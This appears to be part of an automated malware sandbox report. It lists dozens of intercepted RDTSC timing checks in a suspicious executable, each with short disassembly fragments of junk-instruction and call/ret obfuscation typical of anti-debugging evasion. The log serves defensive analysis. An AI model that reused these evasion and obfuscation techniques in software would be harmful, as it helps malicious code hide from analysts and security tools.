Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42F32E second address: 42F334 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42F334 second address: 42F33A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42F33A second address: 42F33E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42F33E second address: 42F368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F6BF4B2C36Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42F368 second address: 42F36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42F36C second address: 42F385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C365h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42F385 second address: 42F39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6BF4F65162h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42F39F second address: 42F3C0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6BF4B2C356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6BF4B2C35Fh 0x00000011 jno 00007F6BF4B2C356h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42F666 second address: 42F677 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6BF4F65156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42F677 second address: 42F69A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F6BF4B2C365h 0x0000000c jng 00007F6BF4B2C356h 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42F69A second address: 42F6A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F6BF4F65156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42F803 second address: 42F81D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C366h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42F81D second address: 42F871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6BF4F6515Bh 0x00000008 jnc 00007F6BF4F65156h 0x0000000e popad 0x0000000f pushad 0x00000010 ja 00007F6BF4F65156h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F6BF4F65169h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 jmp 00007F6BF4F65164h 0x00000028 pushad 0x00000029 popad 0x0000002a pop ebx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42F871 second address: 42F878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42FB38 second address: 42FB3E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42FF8F second address: 42FF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42FF95 second address: 42FF9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4300BE second address: 4300C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 430240 second address: 430246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4303C6 second address: 4303CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4303CA second address: 4303D0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4303D0 second address: 4303D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4303D6 second address: 4303F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65165h 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F6BF4F65156h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 430B5E second address: 430B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 430B64 second address: 430B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 430B6A second address: 430B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 430E4F second address: 430E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 430E57 second address: 430E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 430E5D second address: 430E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 430E61 second address: 430E65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4310F1 second address: 4310F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 434534 second address: 434538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 40650A second address: 406518 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6BF4F65156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 406518 second address: 40651E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 40651E second address: 406522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 406522 second address: 40652C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6BF4B2C356h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 40652C second address: 406540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6BF4F6515Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 436B93 second address: 436B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 436B99 second address: 436B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 436B9D second address: 436BA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4361C5 second address: 4361D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43B691 second address: 43B697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43B697 second address: 43B6A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F6515Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43B6A9 second address: 43B6B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43BD9F second address: 43BDBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jns 00007F6BF4F6515Eh 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43BDBB second address: 43BDC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43F452 second address: 43F456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43F456 second address: 43F45F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43F54C second address: 43F596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F6BF4F65169h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jno 00007F6BF4F65164h 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 js 00007F6BF4F65156h 0x00000027 pop ebx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43F8AE second address: 43F8B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43FA86 second address: 43FA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43FA8B second address: 43FA95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6BF4B2C356h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43FBCB second address: 43FBD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43FC91 second address: 43FC9B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6BF4B2C35Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 440056 second address: 44005A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4400D1 second address: 4400D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 440339 second address: 44033F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44033F second address: 44034F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 js 00007F6BF4B2C35Eh 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4415E9 second address: 441604 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65163h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 443C61 second address: 443CAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F6BF4B2C358h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 mov di, 1576h 0x0000002d and si, 9470h 0x00000032 push 00000000h 0x00000034 mov esi, dword ptr [ebp+122D335Dh] 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edi 0x0000003f pop edi 0x00000040 pop eax 0x00000041 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4445D7 second address: 4445DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4445DE second address: 444658 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F6BF4B2C35Fh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F6BF4B2C358h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007F6BF4B2C358h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 mov edi, 083F6A42h 0x00000049 push 00000000h 0x0000004b movsx edi, bx 0x0000004e xchg eax, ebx 0x0000004f pushad 0x00000050 push ecx 0x00000051 je 00007F6BF4B2C356h 0x00000057 pop ecx 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 445FAE second address: 445FEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F6515Ch 0x00000007 jg 00007F6BF4F65156h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F6BF4F6515Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6BF4F65165h 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 445FEA second address: 445FEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 449A8D second address: 449A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 449A91 second address: 449A95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 448C12 second address: 448C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 449A95 second address: 449A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 449A9B second address: 449AA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 449AA1 second address: 449AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 449AA5 second address: 449B31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jns 00007F6BF4F65163h 0x00000012 jmp 00007F6BF4F6515Dh 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F6BF4F65158h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 mov dword ptr [ebp+122D2881h], edi 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007F6BF4F65158h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 00000015h 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 mov ebx, dword ptr [ebp+122D336Ah] 0x0000005a push 00000000h 0x0000005c or di, 90E1h 0x00000061 mov ebx, 09C80D00h 0x00000066 xchg eax, esi 0x00000067 push ecx 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44BB30 second address: 44BB8C instructions: 0x00000000 rdtsc 0x00000002 js 00007F6BF4B2C358h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnc 00007F6BF4B2C35Eh 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F6BF4B2C358h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e jmp 00007F6BF4B2C35Fh 0x00000033 push 00000000h 0x00000035 mov ebx, esi 0x00000037 push 00000000h 0x00000039 or edi, dword ptr [ebp+122D3B0Fh] 0x0000003f xchg eax, esi 0x00000040 push esi 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44BB8C second address: 44BB90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44BB90 second address: 44BBB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6BF4B2C367h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44BBB2 second address: 44BBB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44CA4E second address: 44CA52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44BD4E second address: 44BD52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44CA52 second address: 44CA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44BD52 second address: 44BD56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44BD56 second address: 44BD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6BF4B2C366h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44CA58 second address: 44CADB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6BF4F65164h 0x00000008 jmp 00007F6BF4F6515Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 jnl 00007F6BF4F6515Ch 0x00000017 pop eax 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F6BF4F65158h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov edi, dword ptr [ebp+122D3A9Bh] 0x00000039 mov ebx, dword ptr [ebp+122D277Ch] 0x0000003f push 00000000h 0x00000041 mov bx, 49A1h 0x00000045 xor edi, 0B5FF0A4h 0x0000004b push 00000000h 0x0000004d call 00007F6BF4F6515Bh 0x00000052 movzx ebx, dx 0x00000055 pop edi 0x00000056 mov ebx, dword ptr [ebp+122D2392h] 0x0000005c xchg eax, esi 0x0000005d js 00007F6BF4F65164h 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44CADB second address: 44CADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44CADF second address: 44CAEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44CAEB second address: 44CAFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C35Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44CAFF second address: 44CB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44D998 second address: 44D99C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44D99C second address: 44D9A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44D9A0 second address: 44D9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44CD37 second address: 44CD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
